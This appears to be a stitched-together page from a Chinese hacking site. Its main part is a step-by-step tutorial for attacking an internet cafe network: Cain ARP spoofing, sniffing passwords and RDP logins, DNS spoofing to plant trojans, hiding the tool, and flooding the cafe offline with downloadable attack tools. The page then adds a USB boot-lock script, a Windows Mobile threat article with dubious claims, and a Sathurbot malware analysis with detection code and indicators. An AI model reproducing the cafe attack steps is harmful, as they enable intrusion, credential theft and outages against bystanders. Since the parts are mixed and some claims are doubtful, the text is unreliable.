China Hacker Cloud teaches you how to attack an internet cafe (stress test); we only upload the tools.

Dear users, hello. It has been a long time since we published a tutorial. A while ago, while playing at an internet cafe, I had the sudden idea of attacking the cafe as a stress test; insufficient bandwidth [in LoL cafes] is a problem common to all internet cafes.
First, some cafes have deployed security builds and security modules that disable tools such as ARP sniffers. Because the corresponding DLLs are missing, some tools cannot be used, so here we provide some basic patches: DLLs that work on every cafe machine, 32-bit or 64-bit. Copy the download address and paste it into your browser.
Click here to download    Cain, the intranet penetration tool; after downloading, install the DLL patch according to whether the cafe machine is 32-bit or 64-bit.
Below is a tutorial on using Cain; if you can't work it out while using it, read this article to the end for an in-depth study. The screenshots and photos from the day we attacked the cafe are gone (we were afraid the network admin would find out, so we didn't take photos; sorry, everyone).
If you can't do this step, skip straight to the next step:


Basic usage of some intranet penetration tools:
Cain & Abel is a free password recovery tool for Microsoft operating systems developed by Oxid.it, billed as the poor man's L0phtCrack. Its features are very powerful: network sniffing, network spoofing, cracking encrypted passwords, decoding scrambled passwords, revealing password boxes, revealing cached passwords and analysing routing protocols; it can even listen in on other people's VoIP calls on the intranet.

Abel is the background service component and is rarely used; here we focus on using Cain.

Installing Cain: first we need to install the WinPcap driver,

[screenshot: Cain LAN sniffing tool tutorial - yes_root]

and clicking Next all the way through completes the installation.

Then we can use Cain. Let's open the legendary Cain; the interface is simple and clear,

but its functions are anything but simple.

Using Cain:

1. Reading cached passwords: switch to the 'Protected Storage' tab and click the plus sign at the top.

All the passwords cached in IE are displayed.

2. Viewing the network

Switch to the 'Network' tab and you can clearly see the structure of the current network; I can also see the shared directories, users and services of the other machines on the intranet. From the screenshot, we can clearly see that Smm-DB1 has the default IPC$ share and hidden shares of the other drives enabled.

3. ARP spoofing and sniffing

ARP spoofing works by manipulating the ARP cache tables of two hosts so as to redirect the normal flow of traffic between them; the result of this injected traffic is the ARP spoofing attack. ARP spoofing and sniffing are the Cain functions we use most. Switch to the 'Sniffer' tab.

Here you can clearly see the IP and MAC addresses of each machine on the intranet.

First we need to configure Cain: click 'Configure' at the very top.

Under 'Sniffer', choose the network card to sniff with; under 'ARP (Arp Poison Routing)' you can forge the IP address and MAC address used for spoofing, to avoid being discovered by the network admin.

Under 'Filters and ports' you can set up filters

and choose the ports to filter according to your needs; for example, to sniff remote desktop passwords, tick RDP port 3389.

Tip: say I want to sniff the machine 61.132.223.10 above; the second network card shows my IP address as 61.132.223.26, which is on the same intranet as the target, so use the second card for spoofing.

Click the network card icon to start sniffing; the radiation symbol next to it is ARP spoofing.

After sniffing for a good while, click 'Passwords' at the bottom; the sniffed passwords are presented by category, including HTTP, FTP, VNC, SMTP, ICQ and so on. If the target host uses a VoIP phone, you can even obtain recordings of their VoIP calls (scary, isn't it?), as shown in the figure.

Next we perform the ARP spoofing: click the 'ARP' tab at the bottom.

Click in the blank area on the right, then click the 'plus' sign at the top; the 'New ARP Poison Routing' dialog appears. Select the gateway on the left and the IP to be spoofed on the right.

Note that if your machine is less powerful than the gateway, the spoofed machine will slow down.

1. DNS spoofing:

Under 'DNS spoofing', fill in the requested DNS name and the IP address to put in the response packet.

As shown, when the target visits www.hao123.com it is automatically redirected to Www.google.cn; '#resp. spoofed' is the number of times the target host has been spoofed.

This is also an excellent way to plant a trojan on the target machine. Click the radiation symbol at the top to start ARP spoofing.

Tip: the gateway IP can be obtained by typing ipconfig at the command line.

As shown, the gateway IP is 61.132.223.4.

2. Remote desktop spoofing:

Cain can perform a man-in-the-middle attack on the Remote Desktop Protocol (RDP) of the remote computer's terminal services, intercepting and decrypting it; that is, it captures the target host's 3389 login password.

Under 'ARP-RDP' three packets have already been captured. Right-click a captured packet on the right and choose 'View'.

I was fairly lucky and obtained the user and password used to log in to the target host over 3389: as shown, the username is 'administrator' and the password is 'asdf1234'.

Trick: when sniffing passwords on a compromised machine, you can press Alt+Delete to hide the interface, Alt+Page Down to hide it from the taskbar, and Alt+Page Up to bring the interface back. This trick is very useful during intranet penetration!
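The ARP spoofing described in section 3 leaves a visible trace on the victim's side: the gateway's IP suddenly answers from a different MAC, and one NIC starts claiming several IPs. The following Python is an added example, not part of the tutorial above and not Cain's code: it runs that check over a small constructed stream of ARP replies (the 61.132.223.x addresses are taken from the tutorial; every MAC address and the capture itself are made up for the demonstration).

```python
"""Flag ARP cache poisoning from a stream of observed ARP replies.

Added example (not from the tutorial above): the gateway 61.132.223.4 and the
hosts 61.132.223.10 / 61.132.223.26 come from the tutorial; all MAC addresses
and the capture itself are constructed for this demonstration.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    t: float   # seconds since the capture started
    ip: str    # sender protocol address: the IP this reply claims
    mac: str   # sender hardware address: the MAC claiming it


GATEWAY_IP = "61.132.223.4"
GATEWAY_MAC = "00:11:22:33:44:01"    # constructed: the real gateway NIC
ATTACKER_MAC = "00:11:22:33:44:26"   # constructed: the NIC of 61.132.223.26
VICTIM_MAC = "00:11:22:33:44:10"     # constructed: the NIC of 61.132.223.10

# Constructed capture: normal replies first, then the spoofing host starts
# answering for both the gateway and the victim, repeating every few seconds.
SAMPLE_CAPTURE = [
    ArpReply(0.0, GATEWAY_IP, GATEWAY_MAC),
    ArpReply(0.5, "61.132.223.10", VICTIM_MAC),
    ArpReply(1.0, "61.132.223.26", ATTACKER_MAC),
    ArpReply(2.0, GATEWAY_IP, ATTACKER_MAC),
    ArpReply(2.0, "61.132.223.10", ATTACKER_MAC),
    ArpReply(4.0, GATEWAY_IP, ATTACKER_MAC),
    ArpReply(4.0, "61.132.223.10", ATTACKER_MAC),
]


def detect_arp_spoof(replies, gateway_ip, gateway_mac=None):
    """Return (kind, detail) alerts in capture order.

    kinds: gateway-mac-changed     the gateway IP moved to a different MAC
           gateway-mac-unexpected  the first reply seen for the gateway does
                                   not match the known-good MAC (if given)
           ip-mac-conflict         some other IP moved to a different MAC
           mac-claims-multiple-ips one NIC answers for more than one IP
    """
    alerts = []
    ip_to_mac = {}                 # last MAC seen claiming each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has ever claimed
    for r in replies:
        mac = r.mac.lower()
        prev = ip_to_mac.get(r.ip)
        if prev is not None and prev != mac:
            kind = "gateway-mac-changed" if r.ip == gateway_ip else "ip-mac-conflict"
            alerts.append((kind, f"t={r.t}: {r.ip} moved {prev} -> {mac}"))
        elif (prev is None and r.ip == gateway_ip and gateway_mac
              and mac != gateway_mac.lower()):
            alerts.append(("gateway-mac-unexpected",
                           f"t={r.t}: gateway claimed by {mac}, expected {gateway_mac.lower()}"))
        ip_to_mac[r.ip] = mac
        claimed = mac_to_ips[mac]
        is_new_ip = r.ip not in claimed
        claimed.add(r.ip)
        if is_new_ip and len(claimed) == 2:   # fire once, when the second IP appears
            alerts.append(("mac-claims-multiple-ips",
                           f"t={r.t}: {mac} answers for {sorted(claimed)}"))
    return alerts


if __name__ == "__main__":
    for kind, detail in detect_arp_spoof(SAMPLE_CAPTURE, GATEWAY_IP, GATEWAY_MAC):
        print(f"{kind:24} {detail}")
```

A static ARP entry for the gateway (arp -s on Windows) or dynamic ARP inspection on a managed switch stops the cache from being overwritten in the first place; the detector above is the cheap host-side check when neither is available.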

4. Password cracking

Cain also has powerful cracking features: it can crack MD5, MD4, PWL, MSSQL and other hashes. Here I demonstrate how to crack an MD5 hash with Cain.

Switch to the 'Cracker' tab, click in the blank area on the right, press the plus sign at the top and enter the 32-character hash we want to crack.

Right-click the hash to crack, choose 'Brute-Force Attack', and select the password length and character set; here I chose 5- to 6-digit purely numeric passwords.

Press 'Start' to begin cracking.

In a short while the cracked password appears before us, haha: the password is 123456. Besides brute force, you can also crack via a dictionary and via rainbow tables.

For reading some other commonly used passwords, refer to the figure below.

It is very simple to use; study it yourselves. The hash calculator's output is shown in the figure:

It can compute MD2, MD5, LM, NT and other hashes of the input.

5. Traceroute

Switch to the 'Traceroute' tab and fill in the target host's IP or domain name; here I fill in www.hackerxfiles.net.

Choose the protocol and port and click 'Start'; after a cup of coffee you can clearly see the IPs of all the servers traversed to reach the HackerXFiles BBS, the time taken and the hostnames.

Cain also has 'LSA Secrets', 'Wireless Scanner' and other features, which we don't use often; interested friends can explore them on their own. The latest version, Cain 4.92, has added Vista support, but the 'Protected Storage' function is not very stable; if you want to read cached passwords, use an earlier version. One last word: Cain really is a superb tool of the hacking world, enormously powerful; all you little hackers please use it with care.


Step 2: download Network Super Neighbor (网络超级邻居) and P2P Terminator (p2p网络终结者).
Network Super Neighbor can detect all online hosts and sharing hosts on the intranet, and can also do open-port detection and detection of server hosts; our usage guide for Network Super Neighbor is as follows:
Open Network Super Neighbor to sniff all online hosts in the whole cafe directly, scan for open ports (135, 3389, 1433 and so on), search for online hosts with open ports, share this machine's files to all open hosts, and so on.
P2P Terminator can be downloaded anywhere via Baidu; if some DLLs are missing, add Cain's DLLs to install and use it.
Because Network Super Neighbor, P2P Terminator and Cain all have in common that they can scan the LAN, finding the right server host and the address of the security module's server host comes down to personal experience. You can use all three and judge by experience from the scan results. We'll add pictures for you later when we have them.
Network Super Neighbor download: http://www.crsky.com/soft/2700.html

P2P Terminator download: http://www.cr173.com/soft/1953.html
Because these programs can be downloaded from any download site found via Baidu, if the two links above stop working, just search Baidu.


Step 3: Snail Attacker Ultimate Edition (蜗牛攻击器终极版) download: https://binghesoft.ctfile.com/file/117068576    If this doesn't work, search Baidu for 蜗牛攻击器终极版.


Step 4: open Snail Attacker, P2P Terminator and Network Super Neighbor.
In Snail Attacker enter the target host to attack: 192.168.xxx.xxx
Add snails.
Be sure not to freeze your own machine; adding 4 or 5 is fine, choose the mode yourself.
P2P Terminator: global control, blacklist. This has something of an ARP effect, but it is not spoofing.
Use Cain to sniff the hosts' account passwords. [If you can't do this step, use the steps above.]


Step 5: after 7 to 8 minutes the whole cafe will go offline. Cain doesn't actually play much of a role here; I mention it so that everyone can sniff some simple LAN passwords; think of it as a kind of brute-force tool, intranet scanning tool and so on.


If the cafe doesn't go offline: attack from two machines at the same time and it dies instantly. In our tests every cafe could be killed instantly; because of the cafes' security problems and bandwidth response problems, a cafe dying instantly is normal. We went to a cafe to test earlier, so we didn't dare take photos or video; we'll definitely get some when we have the chance. If you can't figure it out, follow our official WeChat public account and leave a message; we have dedicated customer service to teach you~~~

China Hacker Cloud teaches you how to make a USB flash drive into a key for entering the system

Nowadays USB flash drives have ever larger capacities and ever lower prices, so they are extremely widespread, and I'm sure everyone has one on hand. Would you like to use a USB drive as the key that opens the door to XP and protects your beloved machine? Then other people cannot boot it because they don't have the matching USB key, and security improves greatly. The method is very simple and needs no third-party software, only XP's own Group Policy tool, in just 3 steps.

Step 1: plug in the USB drive, then double-click to open 'My Computer' and check the drive letter Windows XP has assigned to your USB drive; mine is K. Copy any personal file to the root directory of the USB drive; I put a photo there named 'U.JPG'.

Step 2: open the Windows XP Notepad program and enter one command:

if not exist K:\u.jpg shutdown -s -f -t 3 -c "Sorry,你不是本机主人,回绝开机!"

Here 'shutdown' is the shutdown command; '-s' is the shut-down parameter, '-r' would mean restart, '-f' forces the shutdown, '-t' is followed by the countdown of 3 seconds, and '-c' gives the message shown at shutdown. The command means: if I cannot find the file 'U.jpg' on drive K, display 'Sorry, you are not the owner of this machine; startup refused!' and shut down automatically after 3 seconds. Of course, if what you copied in step 1 was the MP3 file 'HackerXfiles.mp3', that works too; just change the corresponding command line. Then save the text as 'Check.bat', with the save location set to C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup on the Windows XP system drive (the GroupPolicy folder is hidden by default, so first make it visible under 'Folder Options'); change the file extension to bat, and the file name can be anything, e.g. hackXfiles.bat.

Step 3: open the Run box by pressing Win+R and enter 'gpedit.msc'. Navigate to 'Local Computer Policy' -> 'Computer Configuration' -> 'Windows Settings' -> 'Scripts (Startup/Shutdown)', then double-click 'Startup' on the right. In the 'Startup Properties' window click 'Add', then in the 'Add a Script' window click 'Browse'; Windows XP automatically opens the system drive folder C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup. Select the newly created Check.bat batch file and click 'Open', then click 'OK' once in the 'Startup' window, and finally close the Group Policy window.

OK, a perfect USB key has now been made; from now on just plug the USB drive into the host before starting XP. When the script runs it checks whether the file 'U.JPG' exists; if the file is not found, it forces a shutdown after 3 seconds. Pick up your USB drive and try it right away!

The Dangers of the Windows Mobile Phone HACKERSCHINA

Introduction and Overview of the Last Article

Our last article examined in greater detail the threats that are posed to the iOS Operating System, which in turn affects all of the wireless devices, which primarily include those of the iPhone and the iPad.

There is often a feeling of safety when using these devices. Much of this reasoning is that, in reality, Apple has not been afflicted by Cyber-attacks as much as the Samsung and the Windows mobile devices have been.

Security experts have noted that Apple goes to extraordinary lengths to ensure that their devices are as hacker proof as possible. For example, there are extremely rigorous Quality Control processes in place, as well as other systems of checks and balances to ensure that only the authorized end user is accessing his or her own iPhone or iPad.

To this extent, Apple has even introduced the use of Biometric Technology to provide a Two-Factor (also known as “2FA”) security approach. This can also be thought of as a “Multi-Modal” approach as well. Really, any Biometric could work in this regard, but Apple chose to make use of Fingerprint Recognition because not only of its strong levels of Ease of Use but also it is the most widely accepted Biometric Technology worldwide.

This push by Apple only came to fruition after it bought a Biometrics Vendor known as “AuthenTec” in a Merger and Acquisition (M&A) activity. At the time, AuthenTec was the premier provider of Fingerprint Recognition Sensors to the Biometrics industry, with a specialty in manufacturing Optical based Sensors.

In fact, this same technology is even being used in the “Apple Pay,” which is basically Apple’s version of the Mobile Wallet. This and the use of Biometric Technology in the Smartphone will be topics of separate articles in the future.

However, as our last two articles have shown, Apple can be just as prone to Cyber-attacks as well. The first article looked at uploading rogue mobile applications onto the App Store by manipulating the Digital Certificates, which are granted to an end user after they have created an account for themselves. The second article examined other Cyber based attacks, which include the following:

  1. A Malicious Configuration Profile:

    Most wireless devices ship with this file so that the end user can set up their Apple wireless device correctly the first time, quickly and easily. However, the Cyber attacker has found a way to create a malicious Configuration Profile and inject it into the iPhone or the iPad.

  2. The WebKit Vulnerability:

    This is a software package, which is used to power the Safari Web Browser. In fact, Apple is not just using it; Google in their Chrome Web Browser is also using it. However, despite the efforts to safeguard this package, the Cyber attacker has found ways in which to inject malicious .exe files into it, with the end result being that the end user is redirected to a spoofed Website.

  3. The Zero Day Attack:

    In these situations, the Cyber attacker has advanced knowledge of a weakness or a vulnerability in the Source Code and takes full advantage of it before the Vendor even knows about it.

In this article, we continue with the theme of Security threats which are posed to Smartphones, but this time the focal point is on the Windows Mobile devices.

The Windows Mobile Operating System

Yes, we have all heard of the Windows Operating Systems. By far, it is the most widely used OS in the world, ranging from the Workstation to the Server editions. These have ranged all the way from Windows 95 to Windows XP to Windows Vista to the latest version, Windows 10.

When compared to just about any other software application or OS (including even the Open Source ones such as that of Linux), Windows has been the most sought after prize of the Cyber attacker.

For example, just about every piece of Malware, Spyware, Adware, and even Trojan Horse has found its way into it. However, unlike the other Wireless Vendors that have made a separate and unique Operating System for their Smartphone product lines, Microsoft took an entirely different approach: it utilized its existing Operating Systems and modified them so that they would serve as the OS for its mobile phone line.

For example, since the latest version is Windows 10, Microsoft simply took the underlying Source Code of that, modified it to fit their Smartphone models, and rebranded it as merely “Windows 10 Mobile”. This Operating System is now available on the Lumia line of Smartphones, which include the Lumia 635, the Lumia 730, and the Lumia 830.

Microsoft’s fundamental reason for taking this approach is that it wanted to “. . . share many of the same features as its desktop version, including the same kernel, UI elements, menus, Settings, and even Cortana.” (SOURCE: 1).

However, there is one fatal flaw in taking this kind of approach: the same type of Cyber threats and risks which are posed to the Windows Operating Systems on the Workstations and Servers can also be used to manipulate the OSs which reside on the Windows line of Smartphones.

Therefore, on a theoretical plane, the effects of one Cyber-attack on a Windows platform will thus be greatly proliferated onto the mobile devices, and vice versa.

The Risks Posed to the Windows Mobile Operating System


  1. Making Network based Files and Shared Resources available to everybody:

    Although the Windows 10 Operating System has put in extra safeguards to protect the private and confidential files of businesses/corporations and even of the end user, the rights which are granted to access them seem to be misconfigured at times, and this is an escalating trend that is of grave concern. This can happen for a myriad of reasons, such as employees who really do not know how to assign permissions properly, or even Network/System Administrators who are so overloaded in their work that they do not double check the permissions that they grant. However, more often than not, it is also the work of the Cyber attacker, who misconfigures these specific rights and permissions as well. What is interesting about this trend is that the Cyber attacker is not out for personal gain in these matters; rather their main intent is to cause financial loss to a business or a corporation when its files and resources become available to the public at large. This type of attack is especially worrisome on the Windows Mobile devices, as many employees now use this tool to store both personal and work related files, and literally millions of wireless devices can fall victim in just a matter of minutes. It should be noted that the primary target in this kind of attack is exposing the “Everyone Group” directory in the Windows 10 Operating System.

  2. Lack of Enablement of the Personal Firewall:

    As was described in the last article, Apple develops a specific Configuration File for the end user to set up their iPhone properly. A major component of this is also making sure that the Security features have been enabled. This even includes the Personal Firewall. In sharp contrast, although the Windows 10 Operating System does have a feature analogous to the Apple Configuration File, the Security features which come with it are not all preset. In other words, the end user has to configure all of this themselves, manually. Even though Windows 10 has a highly GUI centered approach for doing this both on the workstation and the Mobile Device, it can still be very confusing, if not daunting, for the end user to configure the Security features and the Personal Firewall properly. As a result, they often give up, thus making their Wireless device that much more prone to a Malware or Spyware Attack. On the flip side, the Personal Firewall on the Windows 10 OS has been deemed to be a powerful tool, such as when it comes to protecting the IPC$ and ADMIN$ shares. It has also been known to block effectively any type or kind of Wireless Intrusion Attack.

  3. Unaccounted for Systems which are running in the background:

    Because the Windows 10 Operating System is deemed to be in some ways “bloated” because of its Closed Source platform, there is one Security weakness it possesses that can affect both the workstation and the mobile devices: its lack of accounting for those resources which run in the background. What this means essentially is that the OS may not even be “aware” at times of the services and other related software applications which are running in the background. This very often includes the Internet Information Services (also known as “IIS”; this is the Web Server software) and SQL Server Express (the free and “watered down” version of the SQL Server Database). Because of this lack of accountability, a Cyber attacker can take advantage of this very quickly and insert a malicious payload, which can spread itself very quickly.

  4. There are no minimum Security Thresholds or Standards which have been established:

    As described, although the Windows 10 Operating System does indeed come with a robust set of Security features, there is still another area in which it is severely lacking: a lack of Best Standards for the businesses and corporations which make use of this OS on their Windows Mobile devices to adopt. Because of this, the IT Staff at many organizations are often left to their own devices to experiment with which Security features of Windows 10 are needed, and which are needed to come into compliance with the Security Policies which have been set forth and established. As a result, there can be significant periods when the “Security guard is let down,” thus making a very fertile time period for the Cyber attacker to launch a wide-scale attack upon the organization.

  5. The Windows 10 for Mobile Phones cannot be tested using the traditional tools:

    Sure, the Windows 10 OS can be tested to make sure that it does indeed come into compliance with the Security requirements and needs of the business entity. However, since this is the latest version from Microsoft, it requires the latest tools to test. The companies with the bigger budgets could probably afford to have these tools, and perhaps even hire top of the line Penetration Testers. Nevertheless, the reality is that many of the smaller to medium-sized businesses cannot afford this, and as a result are forced to test their Windows Mobile devices with outdated testing tools. This leads to incomplete and very often inaccurate results, which will make the Windows Mobile device that much more vulnerable to a Cyber based attack. Another problem compounding this issue is that Windows 10 is based on a Closed Source platform (just like the older OS versions and other Microsoft products), so trying to conduct a Penetration Test on the Source Code is very difficult, if not impossible, to accomplish.

  6. Automated Updates and Patches:

    Windows 10 is notorious for this feature. It often occurs at the most inconvenient times. Although the primary intention of this is to keep the Windows Mobile device up to date with the latest Security Patches, there is a chance that one of those updates could very well be a rogue application (such as Malware or Spyware) inserted into the process by a sophisticated Cyber attacker. Unfortunately, there is no way of knowing this until it is too late. For instance, the Windows 10 OS will only notify you which specific updates and/or patches have been installed after the fact.

Conclusions

In summary, this article has examined the Security threats and risks which are posed primarily to the Windows 10 Operating System (OS). As was discussed earlier, this OS is not only available for workstations and PCs, but it has also been modified and restructured in such a way by Microsoft that it is also available on their Windows Mobile phone product line.

Although this might have proven to be an effective strategy regarding cost savings, it also presents a double-edged sword when it comes to Security: for instance, the same threats which are inherent to the workstation and PC versions are also directed at the mobile phone versions of the Windows 10 OS.

Thus far, in this series, we have examined the Security Vulnerabilities to all three major mobile phone OSs:

  1. The iOS
  2. The Android OS
  3. The Windows 10 Mobile OS.

A future article will examine how an end user, or even a business entity, can take preventative steps to make sure that their Smartphone does not become the target for a Cyber based attack. Our next article will focus on another Security concept of the Smartphone – “Jailbreaking.”


Sathurbot: Distributed WordPress password attack (HackersChina)

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file, while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice the victim to run the executable, which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed to see whether they were built with the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted as login:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted by any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. In particular, the wp.getUsersBlogs API is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even against websites that do not host WordPress, are the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.

Examination of logs, system artifacts and files shows that the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request and no web browser open, and look for an excessive number of requests such as GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for the files or registry entries listed in the IoC section below.
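The log checks described under Detection can be scripted. The Python below is an added example and not ESET's code: it parses a handful of constructed Apache combined-format log lines, counts how many distinct sources hit /wp-login.php or /xmlrpc.php and how many of them try exactly once (the one-attempt-per-site pattern the article describes), notes probes answered with 404 (a login probe against a site that does not run WordPress), and matches DNS query names against the two DNS domains from the IoC section. The thresholds min_sources and single_attempt_ratio are assumptions to tune per site.

```python
"""Spot Sathurbot-style distributed login probing in web-server logs.

Added example, not ESET's code. The log lines below are constructed in Apache
combined format; the IoC domains are the two DNS names listed in the IoC
section of the write-up. Thresholds are assumptions to tune per site.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")   # endpoints the bot hits
IOC_DNS_DOMAINS = {"zeusgreekmaster.xyz", "apollogreekmaster.xyz"}

# Constructed sample: six distinct sources each post to xmlrpc.php exactly once,
# one real admin logs in (GET then POST), one probe hits a site without WordPress.
SAMPLE_LOG = """\
198.51.100.10 - - [10/Apr/2017:09:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2017:09:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.17 - - [10/Apr/2017:09:00:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.10 - - [10/Apr/2017:09:00:05 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.42 - - [10/Apr/2017:09:00:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Apr/2017:09:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Apr/2017:09:00:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.88 - - [10/Apr/2017:09:00:16 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.91 - - [10/Apr/2017:09:00:18 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.120 - - [10/Apr/2017:09:00:20 +0000] "POST /xmlrpc.php?rsd HTTP/1.1" 200 412 "-" "Mozilla/5.0"
""".splitlines()


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze_login_probes(lines, min_sources=5, single_attempt_ratio=0.8):
    """Summarise hits on the WordPress login/XML-RPC endpoints.

    The tell-tale of Sathurbot is many distinct source IPs that each try the
    endpoint once and never return, rather than one IP hammering it.
    """
    attempts_per_ip = Counter()
    probes_on_404 = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]      # drop any query string
        if not path.endswith(LOGIN_PATHS):
            continue
        attempts_per_ip[rec["ip"]] += 1
        if rec["status"] == "404":               # login probe on a non-WordPress site
            probes_on_404 += 1
    sources = len(attempts_per_ip)
    singles = sum(1 for n in attempts_per_ip.values() if n == 1)
    ratio = singles / sources if sources else 0.0
    return {
        "sources": sources,
        "single_attempt_sources": singles,
        "single_attempt_ratio": ratio,
        "probes_on_404": probes_on_404,
        "distributed_attack": sources >= min_sources and ratio >= single_attempt_ratio,
    }


def is_ioc_domain(qname, iocs=IOC_DNS_DOMAINS):
    """True if a DNS query name is, or is under, one of the known C&C lookup domains."""
    name = qname.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in iocs)


if __name__ == "__main__":
    print(analyze_login_probes(SAMPLE_LOG))
```

Run it over a real access log with analyze_login_probes(open("access.log")). If the site does not need XML-RPC, WordPress's xmlrpc_enabled filter (add_filter('xmlrpc_enabled', '__return_false') in a plugin or theme) switches it off, as the Prevention section advises.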

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages that do not belong to the site, and optionally wipe and restore the site from a backup.

Users – Using a third-party file manager, find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected .DLL, and reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

It runs in the context of the rundll32.exe or explorer.exe process and locks its files and registry keys against editing. The installer carries both 32-bit and 64-bit versions.

Subfolders of the above (contain the files seeded by torrent):
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
